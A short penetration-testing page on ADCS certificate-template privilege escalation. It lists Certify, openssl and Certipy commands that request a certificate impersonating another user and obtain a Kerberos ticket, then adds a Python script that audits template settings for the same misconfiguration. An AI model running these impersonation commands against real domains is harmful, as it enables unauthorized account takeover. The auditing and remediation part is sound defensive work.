LDAP - Privilege Escalation

A list of LDAP privilege escalation techniques.

ADCS: Active Directory Certificate Services

A list of privilege escalation techniques for ADCS.

Certificate Template Exploit

Certificate templates in ADCS (Active Directory Certificate Services) are pre-configured definitions of the parameters for a particular type of certificate that the certificate authority (CA) can issue.

We can use Certify.exe to find vulnerable certificate templates.

.\Certify.exe find /vulnerable

Request a new certificate from the vulnerable template, passing the user to impersonate as the alternative name.

.\Certify.exe request /ca:<AD-CA_name> /template:<Template_name> /altname:<user_you_want_to_impersonate>

This will produce a cert.pem. Use openssl to convert it into a .pfx file.

# get cert.pfx
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Now request a TGT using Certipy.

certipy auth -pfx cert.pfx -dc-ip <DC_IP> -u '<user_you_want_to_impersonate>' -domain <domain_name>
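
From the defender's side, the template settings that allow a request like the one above can be audited directly. The following is an added example (not from the original page or the Certify/Certipy projects): it checks exported template attributes for a requester-supplied subject combined with an authentication EKU and no manager approval or authorized-signature requirement. The records, the enroll_principals field and the function names are constructed for illustration.

```python
# Added example: flag certificate templates whose settings let a requester name
# another user in the certificate. Attribute names follow the AD schema.
ENROLLEE_SUPPLIES_SUBJECT = 0x1   # bit in msPKI-Certificate-Name-Flag
PEND_ALL_REQUESTS = 0x2           # bit in msPKI-Enrollment-Flag (manager approval)
AUTH_EKUS = {"1.3.6.1.5.5.7.3.2", "1.3.6.1.5.2.3.4",    # Client Auth, PKINIT Client Auth
             "1.3.6.1.4.1.311.20.2.2", "2.5.29.37.0"}   # Smart Card Logon, Any Purpose
# Assumption: enrollment ACLs were already resolved to principal names.
BROAD_PRINCIPALS = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}

def audit_template(t):
    """Return the findings for one template record (empty list means no finding)."""
    ekus = set(t.get("pKIExtendedKeyUsage", []))
    supplies_subject = t.get("msPKI-Certificate-Name-Flag", 0) & ENROLLEE_SUPPLIES_SUBJECT
    allows_auth = bool(not ekus or ekus & AUTH_EKUS)   # no EKU at all means any purpose
    gated = t.get("msPKI-Enrollment-Flag", 0) & PEND_ALL_REQUESTS or t.get("msPKI-RA-Signature", 0) > 0
    if not (supplies_subject and allows_auth):
        return []
    if gated:
        return ["requester-supplied subject, gated only by approval or signature"]
    findings = ["requester-supplied subject with authentication EKU and no approval gate"]
    broad = BROAD_PRINCIPALS & set(t.get("enroll_principals", []))
    if broad:
        findings.append("enrollable by: " + ", ".join(sorted(broad)))
    return findings

def audit(templates):
    """Map template name to findings, keeping only templates that have findings."""
    return {t["name"]: f for t in templates if (f := audit_template(t))}

SAMPLE_TEMPLATES = [  # constructed records, not taken from a real directory
    {"name": "WebVPN-User", "msPKI-Certificate-Name-Flag": 0x1,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"], "msPKI-Enrollment-Flag": 0,
     "msPKI-RA-Signature": 0, "enroll_principals": ["Domain Users"]},
    {"name": "WebServer-Approved", "msPKI-Certificate-Name-Flag": 0x1,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"], "msPKI-Enrollment-Flag": 0x2,
     "msPKI-RA-Signature": 0, "enroll_principals": ["Web Admins"]},
    {"name": "User-Default", "msPKI-Certificate-Name-Flag": 0x82000000,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"], "msPKI-Enrollment-Flag": 0x29,
     "msPKI-RA-Signature": 0, "enroll_principals": ["Domain Users"]},
]

if __name__ == "__main__":
    for name, findings in audit(SAMPLE_TEMPLATES).items():
        print(name, "->", "; ".join(findings))
```

Templates it reports should have the requester-supplied subject option disabled or manager approval enabled, and their enrollment rights narrowed.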

💡 You can find more information about this subject at the links below:

ADCS privesc Resources
